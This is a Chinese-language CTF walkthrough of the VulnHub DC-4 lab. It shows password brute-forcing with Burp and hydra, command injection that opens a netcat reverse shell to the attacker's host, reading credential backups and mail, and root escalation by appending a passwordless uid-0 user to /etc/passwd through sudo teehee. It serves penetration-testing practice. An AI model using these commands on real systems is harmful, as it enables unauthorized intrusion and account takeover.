漏洞复现 -- DC-4

靶场地址

https://download.vulnhub.com/dc/DC-4.zip

目标

获取flag

漏洞复现

flag

sudo arp-scan -l
# 探测主机存活

nmap -p- 192.168.222.139 --min-rate=5000
# 扫描开放端口

http://192.168.222.139:80

根据登陆页面提醒，使用BurpSuite爆破admin用户的密码

admin/happy

登陆进去后，发现有“command”工具，进入查看，点击“run”，发现执行了“ls -l”命令，再次时候BP抓包

构造命令来反弹shell

kali： nc -lvvp 8888
bp：radio=nc+-e+/bin/bash+192.168.222.128+8888&submit=%E8%B7%91

python -c "import pty;pty.spawn('/bin/bash')"
# 根据我们习惯，更换一个交互式命令模式

更换到home目录下，查看信息
cd ../../../../home
ls -al

cd jim
ls
cat test.sh
cat mbox
cat backups

cd mabkups
ls
cat old-passwords.bak

通过test.sh脚本的提示信息，再加上查看发现的backups目录当中有密码信息，通过得到的三个用户名信息，再加上这个密码信息，可以尝试ssh爆破登录，观察是否可成功爆破出ssh用户的登录密码

hydra -L user.txt -P passwd.txt ssh://192.168.222.139
# 使用hydra工具爆破ssh账号密码

jim/jibril04

ssh jim@192.168.222.139
jibril04
# 使用SSH连接

ls
cat mbox
# 发现jim有邮件

cd var/spool/mail
# 进入用邮件目录下
ls
cat jim
# 发现邮件内容 Charles/^xHhA&hvim0y

su charles(记得用小写，因为写信人开头字母要大写)
^xHhA&hvim0y

sudo -l
# 查看可以sudo执行的命令

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 看到teehee，那我们可以用teehee写一些信息到/etc/passwd里面

su admin
id
# 切换到admin用户

cd /root
ls
cat flag.txt

总结

1、Hydra（暴力破解密码工具）

基本语法：
  Hydra [-l 用户名|–L 用户名文件路径] [-p 密码|–P 密码文件路径] [-t 线程数] [–vV 显示详细信息] [–o 输出文件路径] [–f 找到密码就停止] [–e ns 空密码和指定密码试探] [ip|-M ip列表文件路径]
常用参数：
  -l					# LOGIN 指定破解的用户，对特定用户破解。
  -L					# FILE 指定用户名字典。
  -p					# PASS 小写，指定密码破解，少用，一般是采用密码字典。
  -P					# FILE 大写，指定密码字典。
  -M					# FILE 指定目标列表文件一行一条。
  -o					# FILE 指定结果输出文件。

hydra -L user.txt -P passwd.txt ssh://192.168.222.139
# 使用hydra工具爆破192.168.222.139的ssh账号密码

2、添加新用户提权

设置uid和gid都为0，那么这个用户就相当于root
格式：[用户名]:[密码]:[uid]:[gid]:[身份描述]:[主目录]:[登录的 shell]

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd